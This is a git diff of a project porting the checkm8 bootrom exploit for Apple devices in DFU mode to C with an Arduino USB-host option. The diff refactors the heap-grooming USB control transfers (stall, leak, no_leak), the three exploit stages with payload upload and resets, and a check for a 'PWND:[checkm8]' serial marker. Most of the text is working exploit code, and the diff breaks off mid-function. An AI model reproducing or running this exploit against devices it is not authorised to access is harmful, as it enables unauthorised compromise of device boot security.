diff --git a/checkm8_arduino/CMakeLists.txt b/checkm8_arduino/CMakeLists.txt index d690522..0059cee 100644 --- a/checkm8_arduino/CMakeLists.txt +++ b/checkm8_arduino/CMakeLists.txt @@ -15,4 +15,5 @@ set(checkm8_arduino_PROGRAMMER avrispmkii) set(checkm8_arduino_PORT /dev/ttyACM0) include_directories(include) +include_directories(../include) generate_arduino_firmware(checkm8_arduino) \ No newline at end of file diff --git a/checkm8_arduino/src/checkm8_arduino.ino b/checkm8_arduino/src/checkm8_arduino.ino index da24245..178f570 100644 --- a/checkm8_arduino/src/checkm8_arduino.ino +++ b/checkm8_arduino/src/checkm8_arduino.ino @@ -1,5 +1,6 @@ -#include +#include "Usb.h" #include "constants.h" +#include "checkm8_config.h" USB Usb; USB_DEVICE_DESCRIPTOR desc_buf; @@ -122,11 +123,9 @@ void heap_occupation() void setup() { - Serial.begin(115200); - Serial.println("checkm8 started"); - if(Usb.Init() == -1) - Serial.println("usb init error"); - delay(200); + Serial.begin(ARDUINO_BAUD); + if(Usb.Init() == -1) Serial.println("failed to initialize USB host shield"); + else Serial.print('\x00'); } void loop() @@ -135,7 +134,8 @@ void loop() state = Usb.getUsbTaskState(); if(state != last_state) { - Serial.print("usb state: "); Serial.println(state, HEX); + Serial.print("usb state: "); + Serial.println(state, HEX); last_state = state; } if(state == USB_STATE_ERROR) @@ -144,7 +144,7 @@ void loop() } if(state == USB_STATE_RUNNING) { - Usb.getDevDescr(addr, 0, 0x12, (uint8_t *) &desc_buf); + Usb.getDevDescr(addr, 0, 0x12, (uint8_t * ) & desc_buf); if(desc_buf.idVendor != 0x5ac || desc_buf.idProduct != 0x1227) { Usb.setUsbTaskState(USB_ATTACHED_SUBSTATE_RESET_DEVICE); diff --git a/checkm8_remote/include/usb_helpers.h b/checkm8_remote/include/usb_helpers.h index 6d2c84a..6271f7c 100644 --- a/checkm8_remote/include/usb_helpers.h +++ b/checkm8_remote/include/usb_helpers.h @@ -38,12 +38,8 @@ int ctrl_transfer(struct pwned_device *dev, unsigned char *data, unsigned short data_len, unsigned int timeout); -int stall(struct pwned_device *dev); -int leak(struct pwned_device *dev); -int no_leak(struct pwned_device *dev); +int reset(struct pwned_device *dev); +int serial_descriptor(struct pwned_device *dev, unsigned char *serial_buf, int len); -int usb_req_stall(struct pwned_device *dev); -int usb_req_leak(struct pwned_device *dev); -int usb_req_no_leak(struct pwned_device *dev); #endif //IPWNDFU_REWRITE_C_LIBUSB_HELPERS_H diff --git a/checkm8_remote/src/exploit.c b/checkm8_remote/src/exploit.c index 490dddb..93ed4b2 100644 --- a/checkm8_remote/src/exploit.c +++ b/checkm8_remote/src/exploit.c @@ -2,33 +2,117 @@ #include #include "usb_helpers.h" -#ifndef WITH_ARDUINO #include #include #include -typedef int(stage_function)(struct pwned_device *dev); +static unsigned char data_0xA_0xC0_buf[192] = + { + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA + }; -int complete_stage(struct pwned_device *device, stage_function *func) +static unsigned char data_0xA_0xC1_buf[193] = + { + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA + }; + +static unsigned char data_0x0_0x40_buf[64] = + { + 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, + 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, + 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, + 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0 + }; + +static unsigned char data_0x0_0x41_buf[65] = + { + 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, + 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, + 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, + 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, + 0x0 + }; + +static unsigned char data_0x0_0xC0_buf[192] = + { + 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, + 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, + 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, + 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, + 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, + 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, + 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, + 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, + 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, + 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, + 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, + 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0 + }; + +int stall(struct pwned_device *dev) { - checkm8_debug_indent("complete_stage(dev = %p, func = %p)\n", device, func); - int ret; + checkm8_debug_indent("stall(dev = %p)\n", dev); + return partial_ctrl_transfer(dev, 0x80, 6, 0x304, 0x40A, data_0xA_0xC0_buf, 0xC0, 1); +} - ret = open_device_session(device); - if(ret == LIBUSB_ERROR_NO_DEVICE || ret == LIBUSB_ERROR_ACCESS) - { - checkm8_debug_indent("\tfailed to get device bundle\n"); - return CHECKM8_FAIL_NODEV; - } +int leak(struct pwned_device *dev) +{ + checkm8_debug_indent("leak(dev = %p)\n", dev); + no_error_ctrl_transfer(dev, 0x80, 6, 0x304, 0x40A, data_0x0_0xC0_buf, 0xC0, 1); + return CHECKM8_SUCCESS; +} - checkm8_debug_indent("\tgot device bundle, calling function\n"); - ret = func(device); +int no_leak(struct pwned_device *dev) +{ + checkm8_debug_indent("no_leak(dev = %p)\n", dev); + no_error_ctrl_transfer(dev, 0x80, 6, 0x304, 0x40A, data_0xA_0xC1_buf, 0xC1, 1); + return CHECKM8_SUCCESS; +} - checkm8_debug_indent("\treleasing device bundle\n"); - close_device_session(device); +int usb_req_stall(struct pwned_device *dev) +{ + checkm8_debug_indent("usb_req_stall(dev = %p)\n", dev); + unsigned char data[0]; + no_error_ctrl_transfer(dev, 0x2, 3, 0, 0x80, data, 0, 10); + return CHECKM8_SUCCESS; +} - return ret; +int usb_req_leak(struct pwned_device *dev) +{ + checkm8_debug_indent("usb_req_leak(dev = %p)\n", dev); + no_error_ctrl_transfer(dev, 0x80, 6, 0x304, 0x40A, data_0x0_0x40_buf, 0x40, 1); + return CHECKM8_SUCCESS; +} + +int usb_req_no_leak(struct pwned_device *dev) +{ + checkm8_debug_indent("usb_req_no_leak(dev = %p)\n", dev); + no_error_ctrl_transfer(dev, 0x80, 6, 0x304, 0x40A, data_0x0_0x41_buf, 0x41, 1); + return CHECKM8_SUCCESS; } int stage1_function(struct pwned_device *dev) @@ -37,15 +121,12 @@ int stage1_function(struct pwned_device *dev) unsigned int i; stall(dev); - for(i = 0; i < 5; i++) - { - no_leak(dev); - } + for(i = 0; i < 5; i++) no_leak(dev); usb_req_leak(dev); no_leak(dev); checkm8_debug_indent("\treset\n"); - libusb_reset_device(dev->bundle->handle); + reset(dev); return CHECKM8_SUCCESS; } @@ -59,7 +140,7 @@ int stage2_function(struct pwned_device *dev) no_error_ctrl_transfer(dev, 0x21, 4, 0, 0, NULL, 0, 0); checkm8_debug_indent("\treset\n"); - libusb_reset_device(dev->bundle->handle); + reset(dev); return CHECKM8_SUCCESS; } @@ -87,7 +168,7 @@ int stage3_function(struct pwned_device *dev) no_error_ctrl_transfer(dev, 0x21, 1, 0, 0, &payload_buf[2048], 352, 100); checkm8_debug_indent("reset\n"); - libusb_reset_device(dev->bundle->handle); + reset(dev); return CHECKM8_SUCCESS; } @@ -96,12 +177,9 @@ int check_function(struct pwned_device *dev) checkm8_debug_indent("checking device serial\n"); unsigned char serial_buf[128]; unsigned int i; - struct libusb_device_handle *handle = dev->bundle->handle; - struct libusb_device_descriptor *desc = dev->bundle->descriptor; - libusb_get_string_descriptor_ascii(handle, desc->iSerialNumber, serial_buf, sizeof(serial_buf)); + serial_descriptor(dev, serial_buf, sizeof(serial_buf)); checkm8_debug_indent("\tgot serial %s\n", serial_buf); - for(i = 0; i < 13; i++) { if(serial_buf[99 + i] != "PWND:[checkm8]"[i]) @@ -112,76 +190,84 @@ int check_function(struct pwned_device *dev) return CHECKM8_SUCCESS; } -#endif struct pwned_device *exploit_device() { + int ret; struct pwned_device *res = calloc(1, sizeof(struct pwned_device)); checkm8_debug_indent("exploit_device() -> dev = %p\n", res); res->status = DEV_NORMAL; res->idVendor = DEV_IDVENDOR; res->idProduct = DEV_IDPRODUCT; - int ret = open_device_session(res); - #ifdef WITH_ARDUINO - + res->ard_fd = -1; #else res->bundle = calloc(1, sizeof(struct libusb_device_bundle)); +#endif - int ret = complete_stage(res, check_function); + ret = open_device_session(res); + if(IS_CHECKM8_FAIL(ret)) + { + checkm8_debug_indent("\tfailed to open device session\n"); + free_device(res); + return NULL; + } + + ret = check_function(res); if(ret == CHECKM8_SUCCESS) { // already exploited res->status = DEV_PWNED; + close_device_session(res); return res; } else if(ret == CHECKM8_FAIL_NODEV) { // no device found - free(res); + free_device(res); return NULL; } else { // normal device found - exploit - ret = complete_stage(res, stage1_function); + ret = stage1_function(res); if(ret == CHECKM8_SUCCESS) { - ret = complete_stage(res, stage2_function); + ret = stage2_function(res); usleep(500000); } if(ret == CHECKM8_SUCCESS) { - ret = complete_stage(res, stage3_function); + ret = stage3_function(res); usleep(500000); } if(ret == CHECKM8_SUCCESS) { - ret = complete_stage(res, check_function); + ret = check_function(res); } if(ret == CHECKM8_SUCCESS) { res->status = DEV_PWNED; + close_device_session(res); return res; } else { - free(res); + free_device(res); return NULL; } } -#endif } void free_device(struct pwned_device *dev) { -#ifndef WITH_ARDUINO close_device_session(dev); +#ifndef WITH_ARDUINO + free(dev->bundle); #endif - free(dev); } \ No newline at end of file diff --git a/checkm8_remote/src/usb_helpers.c b/checkm8_remote/src/usb_helpers.c index 7a24222..c9aa67a 100644 --- a/checkm8_remote/src/usb_helpers.c +++ b/checkm8_remote/src/usb_helpers.c @@ -1,13 +1,19 @@ #include "usb_helpers.h" +#ifdef WITH_ARDUINO + +#include +#include +#include + +#else + #include #include -#include -#include -#include - #include "libusbi.h" +#endif + int open_device_session(struct pwned_device *dev) { checkm8_debug_indent("open_device_session(dev = %p)\n", dev); @@ -15,21 +21,49 @@ int open_device_session(struct pwned_device *dev) #ifdef WITH_ARDUINO // based on https://github.com/todbot/arduino-serial/blob/master/arduino-serial-lib.c struct termios toptions; - int ard = open(ARDUINO_DEV, O_RDWR | O_NONBLOCK); - if(ard == -1) + char buf; + int ard_fd = open(ARDUINO_DEV, O_RDWR | O_NONBLOCK); + if(ard_fd == -1) { checkm8_debug_indent("\tfailed to open arduino device %s\n", ARDUINO_DEV); return CHECKM8_FAIL_NODEV; } - if(tcgetattr(ard, &toptions) < 0) + checkm8_debug_indent("\topened arduino device %s\n", ARDUINO_DEV); + if(tcgetattr(ard_fd, &toptions) < 0) { checkm8_debug_indent("\tfailed to get arduino terminal attributes\n"); + close(ard_fd); return CHECKM8_FAIL_NODEV; } - cfsetispeed(&toptions, ARDUINO_BAUD); - cfsetospeed(&toptions, ARDUINO_BAUD); + speed_t brate; + switch(ARDUINO_BAUD) + { + case 4800: + brate = B4800; break; + + case 9600: + brate = B9600; break; + + case 19200: + brate = B19200; break; + + case 38400: + brate = B38400; break; + + case 57600: + brate = B57600; break; + + case 115200: + brate = B115200; break; + + default: + brate = B9600; break; + } + + cfsetispeed(&toptions, brate); + cfsetospeed(&toptions, brate); toptions.c_cflag &= ~PARENB; toptions.c_cflag &= ~CSTOPB; @@ -45,14 +79,36 @@ int open_device_session(struct pwned_device *dev) toptions.c_cc[VMIN] = 0; toptions.c_cc[VTIME] = 0; - tcsetattr(ard, TCSANOW, &toptions); - if(tcsetattr(ard, TCSAFLUSH, &toptions) < 0) + tcsetattr(ard_fd, TCSANOW, &toptions); + if(tcsetattr(ard_fd, TCSAFLUSH, &toptions) < 0) { checkm8_debug_indent("\tfailed to set terminal attributes"); + close(ard_fd); return CHECKM8_FAIL_NODEV; } - return CHECKM8_SUCCESS; + checkm8_debug_indent("\tset arduino terminal attributes\n"); + + // read a setup verification byte + while(read(ard_fd, &buf, 1) == 0); + if(buf == '\x00') + { + checkm8_debug_block("\tarduino successfully setup\n"); + dev->ard_fd = ard_fd; + return CHECKM8_SUCCESS; + } + else + { + checkm8_debug_indent("\tarduino error: "); + while(buf != '\n') + { + checkm8_debug_block("%c", buf); + while(read(ard_fd, &buf, 1) == 0); + } + + close(ard_fd); + return CHECKM8_FAIL_NOTDONE; + } #else int i, usb_dev_count, ret = CHECKM8_FAIL_NODEV; libusb_device **usb_device_list = NULL; @@ -136,7 +192,15 @@ int close_device_session(struct pwned_device *dev) checkm8_debug_indent("close_device_session(dev = %p)\n", dev); #ifdef WITH_ARDUINO + int ret = close(dev->ard_fd); + dev->ard_fd = -1; + if(ret == -1) + { + checkm8_debug_indent("\tfailed to close arduino fd\n"); + return CHECKM8_FAIL_NODEV; + } + return CHECKM8_SUCCESS; #else if(dev->bundle->handle != NULL) { @@ -160,30 +224,21 @@ int close_device_session(struct pwned_device *dev) free(dev->bundle->descriptor); dev->bundle->descriptor = NULL; } -#endif return CHECKM8_SUCCESS; +#endif } int is_device_session_open(struct pwned_device *dev) { #ifdef WITH_ARDUINO - + return dev->ard_fd != -1; #else return dev->bundle->ctx != NULL && dev->bundle->device != NULL && dev->bundle->handle != NULL && dev->bundle->descriptor != NULL; #endif } -#ifndef WITH_ARDUINO -void LIBUSB_CALL async_ctrl_transfer_cb(struct libusb_transfer *transfer) -{ - checkm8_debug_indent("transfer status: %s (%i / %i)\n", - libusb_error_name(transfer->status), - transfer->actual_length, - transfer->length); -} -#endif int partial_ctrl_transfer(struct pwned_device *dev, unsigned char bmRequestType, unsigned char bRequest, @@ -207,7 +262,7 @@ int partial_ctrl_transfer(struct pwned_device *dev, struct libusb_transfer *usb_transfer = libusb_alloc_transfer(0); libusb_fill_control_setup(usb_transfer_buf, bmRequestType, bRequest, wValue, wIndex, data_len); memcpy(&usb_transfer_buf[8], data, data_len); - libusb_fill_control_transfer(usb_transfer, dev->bundle->handle, usb_transfer_buf, async_ctrl_transfer_cb, NULL, 1); + libusb_fill_control_transfer(usb_transfer, dev->bundle->handle, usb_transfer_buf, NULL, NULL, 1); checkm8_debug_indent("\tsubmiting urb\n"); ret = libusb_submit_transfer(usb_transfer); @@ -263,8 +318,7 @@ int no_error_ctrl_transfer(struct pwned_device *dev, } } - ret = libusb_control_transfer(dev->bundle->handle, bmRequestType, bRequest, wValue, wIndex, data, data_len, - timeout); + ret = libusb_control_transfer(dev->bundle->handle, bmRequestType, bRequest, wValue, wIndex, data, data_len, timeout); checkm8_debug_indent("\tgot error %s but ignoring\n", libusb_error_name(ret)); return CHECKM8_SUCCESS; #endif @@ -276,6 +330,10 @@ int ctrl_transfer(struct pwned_device *dev, unsigned char *data, unsigned short data_len, unsigned int timeout) { + checkm8_debug_indent( + "ctrl_transfer(dev = %p, bmRequestType = %i, bRequest = %i, wValue = %i, wIndex = %i, data = %p, data_len = %i, timeout = %i)\n", + dev, bmRequestType, bRequest, wValue, wIndex, data, data_len, timeout); + #ifdef WITH_ARDUINO // TODO #else @@ -287,104 +345,23 @@ int ctrl_transfer(struct pwned_device *dev, #endif } -static unsigned char data_0xA_0xC0_buf[192] = - { - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA - }; - -static unsigned char data_0xA_0xC1_buf[193] = - { - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA - }; - -static unsigned char data_0x0_0x40_buf[64] = - { - 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, - 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, - 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, - 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0 - }; - -static unsigned char data_0x0_0x41_buf[65] = - { - 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, - 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, - 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, - 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, - 0x0 - }; - -static unsigned char data_0x0_0xC0_buf[192] = - { - 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, - 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, - 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, - 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, - 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, - 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, - 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, - 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, - 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, - 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, - 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, - 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0 - }; - -int stall(struct pwned_device *dev) +int reset(struct pwned_device *dev) { - return partial_ctrl_transfer(dev, 0x80, 6, 0x304, 0x40A, data_0xA_0xC0_buf, 0xC0, 1); +#ifdef WITH_ARDUINO + +#else + return libusb_reset_device(dev->bundle->handle); +#endif } -int leak(struct pwned_device *dev) +int serial_descriptor(struct pwned_device *dev, unsigned char *serial_buf, int len) { - no_error_ctrl_transfer(dev, 0x80, 6, 0x304, 0x40A, data_0x0_0xC0_buf, 0xC0, 1); - return CHECKM8_SUCCESS; -} +#ifdef WITH_ARDUINO -int no_leak(struct pwned_device *dev) -{ - no_error_ctrl_transfer(dev, 0x80, 6, 0x304, 0x40A, data_0xA_0xC1_buf, 0xC1, 1); - return CHECKM8_SUCCESS; -} +#else + struct libusb_device_handle *handle = dev->bundle->handle; + struct libusb_device_descriptor *desc = dev->bundle->descriptor; -int usb_req_stall(struct pwned_device *dev) -{ - unsigned char data[0]; - no_error_ctrl_transfer(dev, 0x2, 3, 0, 0x80, data, 0, 10); - return CHECKM8_SUCCESS; -} - -int usb_req_leak(struct pwned_device *dev) -{ - no_error_ctrl_transfer(dev, 0x80, 6, 0x304, 0x40A, data_0x0_0x40_buf, 0x40, 1); - return CHECKM8_SUCCESS; -} - -int usb_req_no_leak(struct pwned_device *dev) -{ - no_error_ctrl_transfer(dev, 0x80, 6, 0x304, 0x40A, data_0x0_0x41_buf, 0x41, 1); - return CHECKM8_SUCCESS; + libusb_get_string_descriptor_ascii(handle, 